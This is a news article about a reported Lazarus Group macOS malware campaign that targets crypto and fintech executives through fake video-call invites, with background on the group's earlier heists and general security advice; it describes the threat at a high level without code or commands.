Lazarus Group Deploys macOS Malware Targeting Crypto Execs

Lawrence Jengar Apr 22, 2026 14:54

Lazarus Group launches macOS malware targeting crypto and fintech executives via fake Zoom calls, aiming to compromise critical credentials.

The notorious Lazarus Group, linked to the North Korean government, has launched a new macOS malware campaign targeting cryptocurrency and fintech executives. Dubbed "Mach-O Man," the malware is distributed via fake Zoom or Google Meet calls, where victims unknowingly execute commands that install the malware in the background.

According to a report by Mauro Eldritch, founder of threat intelligence firm BCA Ltd., the malware exploits social engineering techniques to bypass traditional security controls. Once installed, it extracts sensitive information such as browser credentials, cookies, macOS Keychain entries, and corporate access data. The stolen data is then exfiltrated to attackers via Telegram, followed by a self-deletion script to cover its tracks.

This campaign underscores Lazarus Group's continued evolution in targeting not just cryptocurrency-native firms but also traditional businesses involved in fintech. Security researchers warn that the malware could lead to account takeovers, financial losses, and exposure of critical corporate data.

A History of High-Profile Attacks

The Lazarus Group, active since at least 2009, is infamous for a series of high-profile cyberattacks. It has been linked to the $81 million Bangladesh Bank heist in 2016, the global WannaCry ransomware attack in 2017, and the $620 million Ronin Network hack in 2022. More recently, in 2025, the group reportedly orchestrated the $1.4 billion Bybit hack—the largest cryptocurrency theft to date.

The group's activities are believed to fund North Korea's state programs, including weapons development, while circumventing international sanctions. Over the years, Lazarus has demonstrated a knack for adapting its tactics, shifting from targeting financial institutions to cryptocurrency platforms, and now, macOS users.

Why This Matters for Crypto and Fintech

This latest attack highlights the increasing risks posed by state-sponsored hacking groups to the crypto and fintech sectors. With billions of dollars in digital assets at stake, cybersecurity remains a critical concern for companies operating in these industries. The Lazarus Group’s pivot to macOS indicates a widening scope of attacks, likely in response to enhanced security measures on other platforms.

For traders and businesses, the implications are clear: heightened vigilance is necessary. Organizations should consider implementing robust endpoint security, employee training on phishing schemes, and network segmentation to limit the fallout of potential breaches.

The Bigger Picture

As Lazarus Group expands its toolkit, it serves as a reminder that the cryptocurrency space remains a prime target for sophisticated cybercriminals. The group's history of adapting to new technologies and platforms emphasizes the need for proactive security measures. With the global crypto market cap exceeding $1 trillion as of 2026, the stakes for securing digital assets have never been higher.

Businesses and executives in the crypto and fintech sectors must stay informed about emerging threats and invest in advanced threat detection and response capabilities. The Lazarus Group’s latest campaign is a stark warning: no platform or operating system is immune.

• lazarus group
• macos malware
• crypto security